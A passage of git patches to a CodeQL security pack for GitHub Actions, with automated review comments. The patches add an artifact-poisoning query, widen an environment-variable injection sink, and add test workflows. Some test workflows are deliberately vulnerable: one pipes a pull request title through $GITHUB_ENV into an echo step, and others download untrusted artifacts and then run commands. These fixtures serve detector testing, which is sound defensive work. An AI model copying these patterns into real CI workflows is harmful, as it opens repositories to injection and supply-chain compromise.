[.name, .archive_download_url] | @tsv' | while read artifact + // do + // IFS=$'\t' read name url <<< "$artifact" + // gh api $url > "$name.zip" + // unzip -d "$name" "$name.zip" + // done + this.(Run).getScript().splitAt("\n").matches("%github.event.workflow_run.artifacts_url%") + } +} 
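Review bot: In the first disjunct of `ArtifactDownloadStep`, `not exists(this.(UsesStep).getArgumentExpr("path"))` only tests for an expression node under `path`, as `getArgumentExpr` is defined in this commit. A literal `path: some/dir` therefore does not exclude the step, while a `path` holding a `${{ }}` expression does, which does not match the comment about excluding downloads outside the current directory. If the intent is "no `path` supplied", the string accessor added in the same commit fits: `not exists(this.(UsesStep).getArgument("path"))`. The mere presence of `path` also says nothing about whether the target is inside the workspace, so the TODO could record that a `path` under the working directory still needs to be reported. The class has no QLDoc; `/** A step that downloads artifacts produced by another workflow run. */` would document what the four disjuncts have in common.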
diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index dbae3f48f80..330920852c1 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll @@ -4,12 +4,13 @@ private import codeql.actions.dataflow.ExternalFlow import codeql.actions.dataflow.FlowSources import codeql.actions.DataFlow -predicate writeToGithubEnvSink(DataFlow::Node sink) { - exists(Expression expr, Run run, string script, string line, string value | +predicate writeToGithubEnvSink(DataFlow::Node exprNode, string key, string value) { + exists(Expression expr, Run run, string script, string line | script = run.getScript() and line = script.splitAt("\n") and - value = line.regexpCapture("echo\\s+.*\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and - expr = sink.asExpr() and + key = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 1) and + value = line.regexpCapture("echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV", 2) and + expr = exprNode.asExpr() and run.getAnScriptExpr() = expr and value.indexOf(expr.getRawExpression()) > 0 ) @@ -17,7 +18,7 @@ predicate writeToGithubEnvSink(DataFlow::Node sink) { private class EnvVarInjectionSink extends DataFlow::Node { EnvVarInjectionSink() { - writeToGithubEnvSink(this) or + writeToGithubEnvSink(this, _, _) or externallyDefinedSink(this, "envvar-injection") } } diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql new file mode 100644 index 00000000000..5b0c4fc4e69 --- /dev/null +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql 
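Review bot: The pattern that `writeToGithubEnvSink` now evaluates twice, `echo\\s+([^=]+)\\s*=(.*)>>\\s*\\$GITHUB_ENV`, has to match the whole split line (compare the explicit `.*` on both sides of the `gh run download` pattern in ArtifactPoisoningQuery.qll). Writes that are indented inside a shell block, quoted as `>> "$GITHUB_ENV"`, braced as `>> ${GITHUB_ENV}`, or followed by trailing whitespace are therefore not recognised as sinks. Allowing a leading `.*`, optional quotes and braces around the variable, and a trailing `\\s*` would close that detection gap. The identical literal is also pasted twice into `envCtxLocalStep` in DataFlowPrivate.qll, so I would keep it in one private predicate, for example `string githubEnvWriteRegex() { result = "..." }`, so the sink and the flow step cannot drift apart.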
@@ -0,0 +1,26 @@ +/** + * @name Artifact poisoning + * @description An attacker may be able to poison the workflow's artifacts and influence on consequent steps. + * @kind problem + * @problem.severity warning + * @precision medium + * @security-severity 9.3 + * @id actions/artifact-poisoning + * @tags actions + * security + * external/cwe/cwe-829 + */ + +import actions +import codeql.actions.security.ArtifactPoisoningQuery + +from LocalJob job, ArtifactDownloadStep download, Step run +where + job.getWorkflow().getATriggerEvent() = "workflow_run" and + (run instanceof Run or run instanceof UsesStep) and + exists(int i, int j | + job.getStep(i) = download and + job.getStep(j) = run and + i < j + ) +select download, "Potential artifact poisoning." diff --git a/ql/src/Security/CWE-829/UntrustedCheckout.ql b/ql/src/Security/CWE-829/UntrustedCheckout.ql index b33c7325526..86b80c67215 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckout.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckout.ql @@ -5,7 +5,7 @@ * that is able to push to the base repository and to access secrets. * @kind problem * @problem.severity warning - * @precision low + * @precision medium * @security-severity 9.3 * @id actions/untrusted-checkout * @tags actions diff --git a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml index b2780d54c04..3cab86f3171 100644 --- a/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml +++ b/ql/test/query-tests/Security/CWE-077/.github/workflows/test1.yml @@ -21,5 +21,7 @@ jobs: - name: Extract Jira Key run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + - name: Sink + run: echo ${{ env.ISSUE_KEY }} diff --git a/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected new file mode 100644 index 00000000000..2d96ec5a435 --- /dev/null 
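Review bot: `run` is declared in the `from` clause of ArtifactPoisoning.ql but never reaches the `select`, so it acts only as an existence check. I would move it into the quantifier, `exists(Step run, int i, int j | (run instanceof Run or run instanceof UsesStep) and job.getStep(i) = download and job.getStep(j) = run and i < j)`, which states the intent and keeps one row per download. The condition holds for any later step whether or not it reads the downloaded files, and with `@security-severity 9.3` that breadth deserves a sentence in the `@description` telling the reader to confirm that a later step consumes the artifact. The description line itself reads better as `An attacker may be able to poison the workflow's artifacts and influence subsequent steps.`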
+++ b/ql/test/query-tests/Security/CWE-077/EnvVarInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected new file mode 100644 index 00000000000..2692d03eefe --- /dev/null +++ b/ql/test/query-tests/Security/CWE-077/PrivilegedEnvVarInjection.expected @@ -0,0 +1,6 @@ +edges +nodes +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +subpaths +#select +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged environment variable injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml index d656fb65ea5..1ad46b0f6eb 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/inter-job0.yml 
@@ -36,7 +36,7 @@ jobs: if: ${{ always() }} - needs: job + needs: job1 steps: - id: sink diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml new file mode 100644 index 00000000000..3cab86f3171 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected index 2ad85054803..1fad288860e 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjection.expected 
@@ -50,6 +50,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -185,6 +186,9 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -282,6 +286,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected index 7061f509b81..25441104064 100644 --- a/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected +++ b/ql/test/query-tests/Security/CWE-094/PrivilegedCodeInjection.expected 
@@ -50,6 +50,7 @@ edges | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | .github/workflows/test.yml:20:18:20:48 | steps.step0.outputs.value | 
@@ -185,6 +186,9 @@ nodes | .github/workflows/simple2.yml:18:9:26:6 | Uses Step: step [value] | semmle.label | Uses Step: step [value] | | .github/workflows/simple2.yml:22:20:22:64 | steps.source.outputs.all_changed_files | semmle.label | steps.source.outputs.all_changed_files | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | semmle.label | steps.step.outputs.value | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | semmle.label | env.ISSUE_KEY | | .github/workflows/test.yml:8:7:10:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/test.yml:8:20:8:50 | steps.step2.outputs.test | semmle.label | steps.step2.outputs.test | | .github/workflows/test.yml:12:9:18:6 | Uses Step: step0 [value] | semmle.label | Uses Step: step0 [value] | 
@@ -281,6 +285,8 @@ subpaths | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | .github/workflows/self_needs.yml:16:20:16:64 | github.event['head_commit']['message'] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | ${{ needs.test1.outputs.job_output }} | | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | .github/workflows/simple1.yml:11:20:11:58 | github.event.head_commit.message | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple1.yml:16:18:16:49 | steps.summary.outputs.value | ${{steps.summary.outputs.value}} | | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | .github/workflows/simple2.yml:14:9:18:6 | Uses Step: source | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/simple2.yml:29:24:29:54 | steps.step.outputs.value | ${{ steps.step.outputs.value }} | +| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | Potential privileged code injection in $@, which may be controlled by an external user. 
| .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | +| .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | .github/workflows/test1.yml:22:38:22:75 | github.event.pull_request.title | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test1.yml:25:20:25:39 | env.ISSUE_KEY | ${{ env.ISSUE_KEY }} | | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | .github/workflows/test.yml:15:20:15:64 | github.event['head_commit']['message'] | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/test.yml:37:20:37:56 | needs.job1.outputs['job_output'] | ${{needs.job1.outputs['job_output']}} | | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:9:19:9:64 | github.event.workflow_run.display_title | ${{ github.event.workflow_run.display_title }} | | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | Potential privileged code injection in $@, which may be controlled by an external user. | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | 
diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml new file mode 100644 index 00000000000..4755350f0fc --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning1.yml @@ -0,0 +1,34 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: actions/github-script@v6 + with: + script: | + let allArtifacts = await github.rest.actions.listWorkflowRunArtifacts({ + owner: context.repo.owner, + repo: context.repo.repo, + run_id: context.payload.workflow_run.id, + }); + let matchArtifact = allArtifacts.data.artifacts.filter((artifact) => { + return artifact.name == "" + })[0]; + let download = await github.rest.actions.downloadArtifact({ + owner: context.repo.owner, + repo: context.repo.repo, + artifact_id: matchArtifact.id, + archive_format: 'zip', + }); + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml new file mode 100644 index 00000000000..725038ab816 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning2.yml @@ -0,0 +1,21 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - uses: dawidd6/action-download-artifact@v2 + with: + name: artifact_name + workflow: wf.yml + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml new file mode 100644 index 00000000000..4d2a9774753 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning3.yml 
@@ -0,0 +1,19 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + gh run download "${WORKFLOW_RUN_ID}" --repo "${GITHUB_REPOSITORY}" --name "artifact_name" + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml new file mode 100644 index 00000000000..26d342f7060 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/artifactpoisoning4.yml @@ -0,0 +1,25 @@ +name: Pull Request Open + +on: + workflow_run: + workflows: ["Prev"] + types: + - completed + +jobs: + Download: + runs-on: ubuntu-latest + steps: + - run: | + artifacts_url=${{ github.event.workflow_run.artifacts_url }} + gh api "$artifacts_url" -q '.artifacts[] | [.name, .archive_download_url] | @tsv' | while read artifact + do + IFS=$'\t' read name url <<< "$artifact" + gh api $url > "$name.zip" + unzip -d "$name" "$name.zip" + done + - name: Run command + run: cmd + + + diff --git a/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml b/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml new file mode 100644 index 00000000000..3cab86f3171 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/.github/workflows/test1.yml @@ -0,0 +1,27 @@ +name: Pull Request Open + +on: + pull_request_target: + branches: + - main + - 14.0.x + + types: + - opened + - reopened + +jobs: + updateJira: + if: github.actor != 'dependabot[bot]' + runs-on: ubuntu-latest + steps: + - name: Checkout repository + uses: actions/checkout@v4 + + - name: Extract Jira Key + run: echo ISSUE_KEY=$(echo "${{ github.event.pull_request.title }}") >> $GITHUB_ENV + + - name: Sink + run: echo ${{ env.ISSUE_KEY }} + + 
diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected new file mode 100644 index 00000000000..8113215481c --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.expected @@ -0,0 +1,4 @@ +| .github/workflows/artifactpoisoning1.yml:13:9:30:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning3.yml:13:9:15:6 | Run Step | Potential artifact poisoning. | +| .github/workflows/artifactpoisoning4.yml:13:9:21:6 | Run Step | Potential artifact poisoning. | diff --git a/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref new file mode 100644 index 00000000000..21d37e957a1 --- /dev/null +++ b/ql/test/query-tests/Security/CWE-829/ArtifactPoisoning.qlref @@ -0,0 +1,2 @@ +Security/CWE-829/ArtifactPoisoning.ql + diff --git a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected index c3a3ec2f988..5a572edf423 100644 --- a/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected +++ b/ql/test/query-tests/Security/CWE-829/UnpinnedActionsTag.expected 
@@ -1,5 +1,6 @@ | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'completely/fakeaction' with ref 'v2', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:19:7:23:4 | Uses Step | Uses Step | | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Unpinned 3rd party Action 'actor_trusted_checkout.yml' step $@ uses 'fakerepo/comment-on-pr' with ref 'v1', not a pinned commit hash | .github/workflows/actor_trusted_checkout.yml:23:7:26:21 | Uses Step | Uses Step | +| .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Unpinned 3rd party Action 'Pull Request Open' step $@ uses 'dawidd6/action-download-artifact' with ref 'v2', not a pinned commit hash | .github/workflows/artifactpoisoning2.yml:13:9:17:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'codecov/codecov-action' with ref 'v3', not a pinned commit hash | .github/workflows/auto_ci.yml:93:9:96:6 | Uses Step | Uses Step | | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Unpinned 3rd party Action 'Python CI' step $@ uses 'peter-evans/create-pull-request' with ref 'v5', not a pinned commit hash | .github/workflows/auto_ci.yml:108:9:119:6 | Uses Step: create_pr | Uses Step: create_pr | | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Unpinned 3rd party Action 'Python CI' step $@ uses 'thollander/actions-comment-pull-request' with ref 'v2', not a pinned commit hash | .github/workflows/auto_ci.yml:125:9:133:6 | Uses Step | Uses Step | From 2a1226c37a65cd5fab9b400845da5bbe692669bc Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 2 Apr 2024 12:54:42 +0200 Subject: [PATCH 0142/1267] Add workflow_dispatch to the triggers for artifact poisoning --- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 5b0c4fc4e69..348b6bbdf08 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql @@ -16,7 +16,7 @@ import codeql.actions.security.ArtifactPoisoningQuery from LocalJob job, ArtifactDownloadStep download, Step run where - job.getWorkflow().getATriggerEvent() = "workflow_run" and + job.getWorkflow().getATriggerEvent() = ["workflow_run", "workflow_dispatch"] and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and From a2bbf704ee0f488030c27bf928dbaa5c2550d0a3 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 11:39:35 +0200 Subject: [PATCH 0143/1267] fix: triggering events for artifact poisoning --- ql/src/Security/CWE-829/ArtifactPoisoning.ql | 22 ++++++++++++++++++-- 1 file changed, 20 insertions(+), 2 deletions(-) diff --git a/ql/src/Security/CWE-829/ArtifactPoisoning.ql b/ql/src/Security/CWE-829/ArtifactPoisoning.ql index 348b6bbdf08..5b71a64d52e 100644 --- a/ql/src/Security/CWE-829/ArtifactPoisoning.ql +++ b/ql/src/Security/CWE-829/ArtifactPoisoning.ql 
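Review bot: The widened trigger list on the `getATriggerEvent()` line has no test behind it: the commit changes only `ArtifactPoisoning.ql`, and the artifact-poisoning fixtures shown on this page all declare `on: workflow_run`. A fixture that downloads an artifact under `on: workflow_dispatch`, with its row added to `ArtifactPoisoning.expected`, would pin the new behaviour. The line would also benefit from a short comment stating why these two events are the ones treated as risky, since the list is an allow-list and any trigger left out of it is silently not reported. The query's `select` clause is outside the hunk.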
@@ -14,9 +14,27 @@ import actions import codeql.actions.security.ArtifactPoisoningQuery -from LocalJob job, ArtifactDownloadStep download, Step run +predicate isSingleTriggerWorkflow(Workflow w, string trigger) { + w.getATriggerEvent() = trigger and + count(string t | w.getATriggerEvent() = t | t) = 1 +} + +from Workflow w, LocalJob job, ArtifactDownloadStep download, Step run where - job.getWorkflow().getATriggerEvent() = ["workflow_run", "workflow_dispatch"] and + w = job.getWorkflow() and + ( + // The Workflow is triggered by an event other than `pull_request` + not isSingleTriggerWorkflow(w, "pull_request") + or + // The Workflow is only triggered by `workflow_call` and there is + // a caller workflow triggered by an event other than `pull_request` + isSingleTriggerWorkflow(w, "workflow_call") and + exists(ExternalJob call, Workflow caller | + call.getCallee() = w.getLocation().getFile().getRelativePath() and + caller = call.getWorkflow() and + not isSingleTriggerWorkflow(caller, "pull_request") + ) + ) and (run instanceof Run or run instanceof UsesStep) and exists(int i, int j | job.getStep(i) = download and From 119c7b81586a064426f4e10aef033d2101a4f8bf Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 3 Apr 2024 11:41:42 +0200 Subject: [PATCH 0144/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index 7d2de60df75..e99a12dda08 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.4 +version: 0.0.5 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index f36c119e720..e37339e16cb 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
